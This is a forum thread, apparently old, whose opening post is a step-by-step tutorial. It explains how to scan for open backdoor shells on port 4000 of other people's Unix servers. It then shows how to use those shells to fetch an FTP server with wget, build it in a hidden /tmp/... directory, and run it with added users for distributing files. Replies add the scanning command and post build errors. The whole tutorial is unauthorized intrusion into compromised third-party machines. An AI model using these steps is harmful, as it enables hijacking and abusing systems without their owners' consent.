While trying to scan for Remote Administrator server without a password i encountered some weird results from the banner scan on the IPs wich had port 4000 opened. sometimes i got banners like these:

sh-2.05$
bash#
sh-2.04#
bash$

since i knew very little of unix systems i first just left em for what they where.
then i remembered there was a shell on unix named bash. so i telnetted to the port and came to the bash$ banner. i tried some unix commands like whoami, ls and df. and damn it was a unix shell. so i tried making it usefull by installing a ftp server...

[Basic system info]
To get a bit more information on the running system (HD size, OS) there are a few commands. mostly you are not root on the server but some other user. you can simply see this when looking at the sign behind the shell.
bash# = root
bash$ = normal user

[OS]
a little trick to find out the operating system is to view the /etc/issue file. u can view the file by typing *cat /etc/issue*. see the example below is running Red Hat 6.2

bash$ cat /etc/issue
cat /etc/issue

Red Hat Linux release 6.2 (Zoot)
Kernel 2.4.17 on a 2-processor i686

bash$
bash$

[u][df command][/b]
the df command gives you information about the HD partitions on the system, in the example below you can see there are 2 partitions of about 17 GB mounted on /home and /usr.

bash$ df
df
Filesystem 1k-blocks Used Available Use% Mounted on
/dev/sda8 280005 89497 176052 34% /
/dev/sda1 31079 6887 22588 23% /boot
/dev/sda6 17059884 13152408 3041576 81% /home
/dev/sda5 17059884 3098788 13095196 19% /usr
/dev/sda7 280005 205982 59567 78% /var
bash$
bash$

[Installing a FTP server]
A lot of common linux ftp servers (glftpd, proftpd, pureftpd) need root to be installed. this is a problem cause most times we are not root. we need a special ftpd that doesnt require root to install. i attached ftp4all to this thread, this is the only none root ftp server i found that worked. if yuo find any other please let me know.

now lets download the ftp4all server to the unix box. goto the servers tmp dir by typing "cd /tmp". we are gonna use wget to download the ftp4all server to the machine. wget is a program to download files from a http server, this means you need to store the ftp4all server package on a http server. download the file with this command.

bash$ wget http://*.*.*.*/ftpd-3.012.tar.gz
wget http://*.*.*.*/ftpd-3.012.tar.gz
--09:19:11-- http://*.*.*.*/ftpd-3.012.tar.gz
=> `ftpd-3.012.tar.gz'
Connecting to *.*.*.*:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 140,779 [application/x-gzip]

0K .......... .......... .......... .......... .......... 36% @ 84.75 KB/s
50K .......... .......... .......... .......... .......... 72% @ 42.77 KB/s
100K .......... .......... .......... ....... 100% @ 12.85 KB/s

09:19:16 (29.40 KB/s) - `ftpd-3.012.tar.gz' saved [140779/140779]

bash$

type "ls" to see if the file is downloaded succesfuly

bash$ ls
ls
ftpd-3.012.tar.gz
bash$

now we need to extract the gzip file, we do this with the tar command. type "tar -zxvf ftpd-3.012.tar.gz"
now you will see the program extract all the files.
when completed type "ls" again you should see a new dir named "ftpd-3.012"
enter that dir with "cd ftpd-3.012"
next thing is to configure the ftp server before accually compiling the files.
type "./configure" this might take a little while but shuold complete WITHOUT errors. if you see errors you can stop and try a new server cause the ftp server can not be installed on this system.

after configuring you can set up the listning port and the ftp root of the server in the ftpd.reg file.
this file is located in the standard/etc/ dir. delete the file by typing "rm ftpd.reg". now you need to edit the file on your own computer. set the basedir to "/tmp/..." and the port to 444. save and upload it to the same http server as where you uploaded the ftpd-3.012.tar.gz file. now download the file to the unix machine with wget. "wget http://*.*.*.*/ftpd.reg".

ok now go back to the /tmp/ftpd-3.012/ dir by typing "cd ../../" type "pwd" to check if yuo are in the correct dir. now yuo have to compile the ftp server files, this is all done automaticly when you type "make". this might take a while but has to complete without errors. now your server is compiled and allmost ready for use.

we first need to make the basedir we typed in the ftpd.reg file. goto the /tmp dir by typing "cd /tmp" now type "mkdir ..." to make a hidden directory.

now go back to the /tmp/ftpd-3.012/ dir by typing "cd ftpd-3.012"
you need to copy the binary files to the /tmp/ftpd-3.012/standard/sbin/ dir.
you can do this by typing "cp bin/* standard/sbin"
now type "cd standard/sbin" and type "./ftpd" to start the server.
you should get this result

FTP4ALL 3.010, Copyright © 1996-1999 by Crescent (crescent@ftp4all.de)
This program is FREE SOFTWARE and distributed under GNU PUBLIC LICENSE
Server on host supernova is ready and listening on ANY_IP_ADDRESS:2000
Base directory : /tmp/.../
Readme file : (none)
Permission file: .permissions
Errlog file : log/ftpd.err
Log file : log/ftpd.log
Log program : (none)
Server program : /tmp/ftpd-3.012/standard/sbin/ftps

now connect to port 444 with flashfxp, use username root with any password.

CONGRATZ YOU NOW HAVE INSTALLED THE FTP SERVER SUCCESFULLY !!!!!

[Starting Commands]
to add users and give the root account a password and some basic operations we have some commands.
first type these 2 commands in flashfxp raw commands

site passwd secret
site group add root 0

the first command gives user root password secret.
the second command adds user root to group 0
next type these commands

site chown root:root /
site chmod o+lc
site chmodr go=clg /
site chmodr go=r /

i'm not gonna explain em all, if you wanna know what they mean check the readme file included in the ftpd-3.012.tar.gz package.
now we nee to add a leech user.
this command adds a user leech

site user add leech

this command gives user leech password leecher

site passwd leech leecher

this command determines the max amount of logins for user leech

site user change leech logins=10

and this last command gives user leech download xs. and gives it no IP mask

site user change uni class=n ip0=*.*.*.*

now upload your stuff
when finished with uploading u HAVE to type these 2 commands to give the files download permissions.

site chmodr go=cl /
site chmodr go=r /

now you can post the server at your boards

Great tuto, i'm going to try it !


But how to secure it ?

hmmm but why is port 4000 open. i will search google.
btw Great tut

nice one dude... it was here before about that port issue

were all the machines scanned redhat linux 6.x based by chance?

hehe it sound like a very good honeypot

wow .. i wonder why there isa shell waiting there ...
prolly some weird exploit giving a permanent shell on that port number ...

most likely you are rehacking boxes when doing this ....


has anybody else tried this yet >?

How are you scanning for the banners? I have tryed scanline but im not having much luck with it

exacly like Paul says!!!

this and search banner:
sl -bhpt 4000 -f scan.txt -o vuln.txt

sh-2.05$
bash#
sh-2.04#
bash$

rcience what iam i doing wrong i tryed 3 different servers.. got the same errors

sh-2.05a$ make
make
make[1]: Entering directory `/tmp/ftpd-3.012/src'
make[2]: Entering directory `/tmp/ftpd-3.012/src/common'
gcc -O -c utils.c -o utils.o
In file included from utils.c:39:
commondef.h:34: parse error before `uid'
commondef.h:34: warning: no semicolon at end of struct or union
commondef.h:35: warning: data definition has no type or storage class
commondef.h:36: warning: data definition has no type or storage class
commondef.h:37: warning: data definition has no type or storage class
commondef.h:38: warning: data definition has no type or storage class
commondef.h:40: parse error before `}'
commondef.h:44: parse error before `uid'
commondef.h:44: warning: no semicolon at end of struct or union
commondef.h:45: warning: data definition has no type or storage class
commondef.h:46: warning: data definition has no type or storage class
commondef.h:47: warning: data definition has no type or storage class
commondef.h:48: parse error before `}'
make[2]: *** [utils.o] Error 1
make[2]: Leaving directory `/tmp/ftpd-3.012/src/common'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/tmp/ftpd-3.012/src'
make: *** [all] Error 2
sh-2.05a$

hmm i got other error: